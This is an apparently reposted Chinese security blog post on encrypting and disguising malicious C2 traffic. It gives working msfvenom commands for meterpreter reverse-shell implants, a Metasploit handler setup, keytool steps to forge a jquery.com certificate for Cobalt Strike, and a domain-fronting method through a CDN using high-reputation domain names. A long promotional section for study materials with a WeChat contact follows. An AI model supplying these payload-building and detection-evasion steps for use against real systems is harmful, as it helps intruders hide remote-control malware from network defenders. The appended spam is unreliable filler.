流量加密小结_恶意加密流量证书利用(1)，面试必问知识点

windows平台：
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.83.130 LPORT=10086 PayloadUUIDTracking=true PayloadUUIDName=reshell HandlerSSLCert=/root/.msf4/loot/20230915172052_default_36.155.132.31_36.155.132.31_pe_747329.pem StagerVerifySSLCert=true -f exe -o shell.exe

也可以使用opemssl生成的证书
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.83.130 LPORT=10086 PayloadUUIDTracking=true PayloadUUIDName=reshell HandlerSSLCert=/root/www.google.com.pem StagerVerifySSLCert=true -f elf > shell.elf

注意：linux平台没有成功反弹shell

选项释义：
HandlerSSLCert：向处理程序通知所使用的PEM证书。
StagerVerifySSLCert：当收到一个连接时执行SSL证书验证。
PayloadUUIDTracking和PayloadUUIDName：可以在监听的时候过滤掉不需要的回连请求。

木马报存在当前目录下

攻击机开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.83.130
set LPORT 10086
set HandlerSSLCert /root/.msf4/loot/20230915172052_default_36.155.132.31_36.155.132.31_pe_747329.pem
set StagerVerifySSLCert true
exploit

在目标中运行木马，成功上线

同样可以加密流量

三、Cobalt Strike定制证书修改C2 profile 加密流量

Cobalt Strike 是很多红队的首选的攻击神器，在后渗透方面效果很好，导致很多IDS入侵检测工具和流量检测工具已经可以拦截和发现，特别是流量方面，如果使用默认证书进行渗透和测试，特别在高度安全的环境下，很容易被流量检测出来并进行拦截。在运行 Cobalt Strike 时，默认使用的证书是 cobaltstrike.store，需要生成新的证书来逃避IDS检测。

首先我们利用keytool工具生成一个证书：

keytool -genkey -alias jquery.com -keyalg RSA -validity 36500 -keystore jquery.store

注意要记住设置证书时的信息，修改C2 profile时需要使用

参数说明：
-genkey： 表示生成密钥对（公钥和私钥）
-keystore：每个 keytool 命令都有一个 -keystore 选项，用于指定 keytool 管理的密钥仓库的永久密钥仓库文件名称及其位置。如果不指定 -keystore 选项，则缺省密钥仓库将是宿主目录中（由系统属性的"user.home"决定）名为 .keystore 的文件。如果该文件并不存在，则它将被创建。
-alias：指定密钥条目的别名，该别名是公开的。
-keyalg：指定密钥的算法，如：RSA、DSA（如果不指定默认采用DSA）)
-validity：指定创建的证书有效期多少天

也可以使用命令直接生成对应的

keytool -keystore jquery.store -storepass jquery -keypass jquery -genkey -keyalg RSA -alias jquery.store -dname “CN=jquery.com, OU=Certificate Authority, O=jQuery, L=US, ST=US, C=en”

生成证书后需要转化成标准的pkcs12格式。

keytool -importkeystore -srckeystore jquery.store -destkeystore jquery.store -deststoretype pkcs12

C2-profile 文件是 Cobalt Strike 内置工具，可以修改流量特征以及修改beacon的默认行为，将攻击流量伪装成正常的流量，防止安全设备对流量特征进行监控和拦截。

这里可以使用github上现成的项目，可以根据自己的需求修改

https://github.com/threatexpress/malleable-c2

(文件篇幅较长，此处不做展示，仅展示要修改的地方)

在CS中建立监听，成功伪造证书

成功上线后，目标与攻击机的通信流量已加密

四、域前置CS搭建

1、原理

​ Domain Fronting，中文译名 “域前置” 或 “域名前置”，是一种用于隐藏真实C2服务器IP且同时能伪装为与高信誉域名通信的技术，多用于木马受控端和控制端之间的隐蔽通信。简言之，利用该技术，可以让受控端以为程序是在和一个高信誉域名通信，但实际上却是在和我们的C2服务器进行通信。

​ 域前置的核心基础是CDN，通过CDN节点将流量转发到真实的C2服务器，其中CDN节点ip通过识别请求的HOST头进行流量转发，利用我们配置域名的高可信度，如我们可以配置域名的高可信度（知名域名的子域名），比如 xxxx.baidu.com，可以有效的躲避流量监测。

​ 一般情况下，1台 CDN 会同时负责多个网站的加速服务，那问题来了：如果我访问的两个网站（www.a.com 和 www.b.com）都是由同1台 CDN 服务器（1.1.1.1）进行加速服务，那么当我使用浏览器访问这两个域名时，浏览器实际上访问的都是 1.1.1.1 这台 CDN 服务器，但我在浏览器访问的域名有可能是 a.com 也可能是 b.com，所以 1.1.1.1 这台 CDN 服务器必须清楚地知道我访问的是哪个域名，然后才能给我返回对应域名的内容。CDN是通过Host 头来确定要访问的目标，即使直接请求 CDN，只要 Host 头中带有想要访问的域名，CDN 就能知道你想和哪个域名通信，进而就能让你和指定的域名互相传送内容。举例如下：

​ 使用curl命令请求cdn 1.1.1.1，并自定义host段为www.b.com的话。就会返回www.b.com的页面。

命令为：curl 1.1.1.1 -H “Host: www.b.com” -v

​ 同理请求同样的cdn，但是将host改为www.a.com,这时候就会返回A页面的信息。如果将curl 后请求的ip改为 www.a.com, host 改为 www.b.com。

命令为：Curl www.a.com -H “Host: www.b.com” -v

​ 上述命令还是显示的是www.b.com的页面,所以最终请求的还是www.b.com。

要注意，Host 头一般被设置为高信誉的域名，或者我们自己申请的 “形似” 高信誉域名的域名。另外，因为 CDN 的存在，访问网站时访问的实际上只是 CDN，而不是直接和网站的真实服务器进行通信，所以利用 CDN 的同时也可以隐藏我们真实C2服务器的 IP。

​ 在HTTP(S)请求中，目标域名通常显示在三个关键位置：DNS查询，TLS（SNI）拓展及HTTP主机头中。通常，这三个地方都会是我们要访问的域名地址，然而，在”Domain Fronting”请求中，DNS查询以及SNI携带了一个域名（前域），而在HTTP host头中携带了另一个域名（隐蔽的，被禁止访问的域名），简单的图例如下：

2、CS实现域前置

（1）配置CDN

​ 某云有一个有趣的特点：当 CDN 配置中的源 IP 为自己云的服务器时，加速时会跳过对域名的检验，直接与配置中的域名绑定的源服务器IP进行通信。利用该特性，我们不需要真正去申请 CDN 时所填写的域名中配置解析相应的 CNAME 了。换言之，只要我们的C2服务器属于该云的服务器，那么我们就无需申请域名，只需要在申请 CDN 时随便填一个没有人绑定过的域名就好了，而且这个域名我们可以填成任何高信誉的域名，例如 test.microsoft.com、oops.microsoft.com…

​ 如果是其他的情况的话，就需要自己为C2服务器申请一个形似高信誉域名的域名。

匿名注册新域名：https://www.freenom.com/zh/index.html?lang=zh

匿名注册免费CDN服务Cloudflare：https://www.cloudflare.com/zh-cn/

（2）CS证书与profile配置

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加VX：vip204888 （备注网络安全获取）

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话，可以联系领取~

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

2️⃣视频配套工具&国内外网安书籍、文档

① 工具

② 视频

③ 书籍

资源较为敏感，未展示全面，需要的最下面获取

② 简历模板

因篇幅有限，资料较为敏感仅展示部分资料，添加上方即可获取👆

一个人可以走的很快，但一群人才能走的更远。如果你从事以下工作或对以下感兴趣，欢迎戳这里加入程序员的圈子，让我们一起学习成长！

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

一个人可以走的很快，但一群人才能走的更远。如果你从事以下工作或对以下感兴趣，欢迎戳这里加入程序员的圈子，让我们一起学习成长！

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算